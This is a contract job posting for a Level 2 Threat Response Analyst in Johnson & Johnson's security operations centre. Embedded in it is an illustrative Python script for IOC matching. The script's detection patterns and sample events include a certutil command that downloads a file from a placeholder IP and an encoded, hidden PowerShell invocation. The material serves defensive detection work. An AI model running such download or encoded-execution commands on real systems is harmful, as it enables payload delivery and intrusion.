What are the responsibilities and job description for the Analyst 4 - Information Security position at jnj?
Johnson & Johnson Family of Companies
Title: Level 2 Threat Response Analyst
Location: Raritan, NJ
Duration: 1 month
Pay Rate: $80.72
Benefits on offer for this contract position: Health Insurance, Life insurance, 401K and Voluntary Benefits
Please note that this is a contract role providing services to the Johnson & Johnson Family of Companies through external staffing partners of Kelly OCG. If you are selected for this role, you will be employed by a contract staffing supplier and will not be a member of the Johnson & Johnson Family of Companies.
Summary:
We are focused, driven, and dedicated to providing world-class security incident handling services. On the Cyber Security Operations Center level 1 (CSOC L1) / level 2 (CSOC L2) team, we continuously monitor endpoints, servers, networks, applications, databases, websites and other IT systems for activity that could indicate a security incident. We analyze security alerts, assess threat impact, and coordinate containment, mitigation and eradication, and we invest in our people to do it well.
Responsibilities:
- Responsible for advanced ticket analysis, foundational remediations, and identifying and implementing continuous improvement initiatives
- Performs secondary investigation of escalations from L1 Analysts, adding context the L1 triage could not establish
- Utilizes SIEM tools and other security technologies, including network traffic monitoring and log analysis, to identify and triage potential security incidents
- Actively remediates complex malware infections, persistence mechanisms, and compromised accounts via file quarantine, registry and startup file modifications, and forced password/session revocation within AD
- Applies a thorough understanding of Cloud and Operational Technology (OT) environments and infrastructure, and uses the tools and methods defined in the standard operating procedure (SOP) to validate indicators of compromise (IOCs) and contain/remediate the threat
- Identifies potential gaps in security controls, proposes active mitigations, and implements blocks based on file hash, malicious domain, IP address, command line, etc.
- Reviews ticket volume for alert tuning and refinement opportunities to drive continuous improvement and automation of detection and remediation
- Assists SOC manager with metrics gathering, review, and reporting
- Assists SOC manager in identifying sources of continuous improvement, creation and maintenance of process documentation, and leading training for CI initiatives
- Responsible for consuming cyber threat intelligence and pursuing continuous education in order to stay current on modern attack vectors and adversaries
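The responsibilities above mention validating indicators of compromise and implementing blocks by file hash, domain, IP and command line. The following is an added illustration, not code from Johnson & Johnson or its SOC tooling, of what that matching looks like when run over normalised log events. The block list, host names, user names, hash, domains (TEST-NET addresses and reserved example domains) and command lines are all constructed for the example; the point is the normalisation each IOC type needs (hash case, domain suffix, CIDR membership, regex on command lines) before a hit is trusted enough to act on.

```python
import ipaddress
import re

# Constructed block list (every value is hypothetical; dummy hash,
# reserved example domains, TEST-NET address ranges)
BLOCKLIST = {
    "sha256": {"0123456789abcdef" * 4},
    "domain": {"update-check.example", "cdn.example.net"},
    "ip": ["203.0.113.45", "198.51.100.0/24"],
    "cmdline": [
        # encoded PowerShell payloads and certutil used as a downloader
        re.compile(r"powershell.*-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
        re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I),
    ],
}

# Single addresses become /32 networks so one membership test covers both forms
_NETS = [ipaddress.ip_network(n, strict=False) for n in BLOCKLIST["ip"]]


def _domain_hit(name):
    """Exact or subdomain match, case-insensitive, ignoring a trailing dot."""
    name = name.lower().rstrip(".")
    for blocked in BLOCKLIST["domain"]:
        if name == blocked or name.endswith("." + blocked):
            return blocked
    return None


def _ip_hit(addr):
    """CIDR membership; unparsable values (empty field, hostname) never match."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None
    for net in _NETS:
        if ip in net:
            return str(net)
    return None


def match_event(event):
    """Return a list of (ioc_type, matched_ioc) pairs for one normalised event."""
    hits = []
    digest = event.get("sha256", "").lower()          # hashes are case-insensitive hex
    if digest in BLOCKLIST["sha256"]:
        hits.append(("sha256", digest))
    dom = _domain_hit(event.get("dest_domain", ""))
    if dom:
        hits.append(("domain", dom))
    net = _ip_hit(event.get("dest_ip", ""))
    if net:
        hits.append(("ip", net))
    cmd = event.get("cmdline", "")
    for pat in BLOCKLIST["cmdline"]:
        if pat.search(cmd):
            hits.append(("cmdline", pat.pattern))
            break                                     # one command-line hit is enough
    return hits


# Constructed sample events: hosts, users and values are made up for the example
SAMPLE_EVENTS = [
    {"host": "WS-0412", "user": "jdoe", "sha256": "0123456789ABCDEF" * 4,
     "dest_domain": "api.update-check.example", "dest_ip": "198.51.100.77",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "SRV-DB01", "user": "svc_backup", "sha256": "ffff" * 16,
     "dest_domain": "backup.corp.example", "dest_ip": "10.20.30.40",
     "cmdline": "sqlservr.exe -sMSSQLSERVER"},
    {"host": "WS-0919", "user": "asmith", "sha256": "",
     "dest_domain": "", "dest_ip": "203.0.113.45",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.45/a.txt a.txt"},
]


def triage(events):
    """Map host -> IOC hits for every event that matched at least one indicator."""
    out = {}
    for ev in events:
        hits = match_event(ev)
        if hits:
            out[ev["host"]] = hits
    return out


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host, hits)
```

Two caveats a reviewer of this logic would raise. Suffix matching on domains and CIDR matching on addresses deliberately widen the net, so a hit on those types is a lead to validate against the SOP, not by itself grounds for a block; and a hash block only stops the exact file, so a recompiled or repacked sample walks past it, which is why the posting pairs hash blocks with domain, IP and command-line blocks.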
Qualifications:
- A minimum of a bachelor’s degree or equivalent related experience is required.
- A minimum of 7 years of cyber investigation experience.
- Excellent executive-level intelligence writing and briefing skills.
- Deep understanding of using SIEM and related tools to conduct investigations.
- Knowledge of incident response processes is required.
- Strong IT experience with common operating systems, services, networking protocols, logging, and attacker techniques and tools is required, as is the ability to articulate how the various data sources relate to one another.
- Proven track record to identify operational deficiencies and drive corrective actions and plans to address them is required.
- A solid grasp of the current threat landscape, including the latest tactics, techniques, and procedures (TTPs), common malware variants, and effective techniques for detecting this malicious activity, is required.
- Superb interpersonal, verbal, and written communication skills are required.
- Possessing the credibility and presence to act as subject matter expert is required.
- Results orientation and a sense of urgency, with the ability to deliver on short timelines, are required.
- Creative problem-solving skills required.
- This role may require up to 10% travel.
Preferred:
- Experience with Cloud Security technologies such as Microsoft Azure Security Center (now Microsoft Defender for Cloud), Log Analytics or Azure Sentinel (now Microsoft Sentinel) is preferred
- Knowledge and experience with industrial networks would be a plus.
- Experience working with virtual, global teams – including diverse groups of people with multifaceted backgrounds and cultural experience is preferred
- Security certifications such as Security+, Network+, GCIH, CISSP, CISM, Certified Ethical Hacker (CEH), or Cybersecurity Practitioner (CSX-P) preferred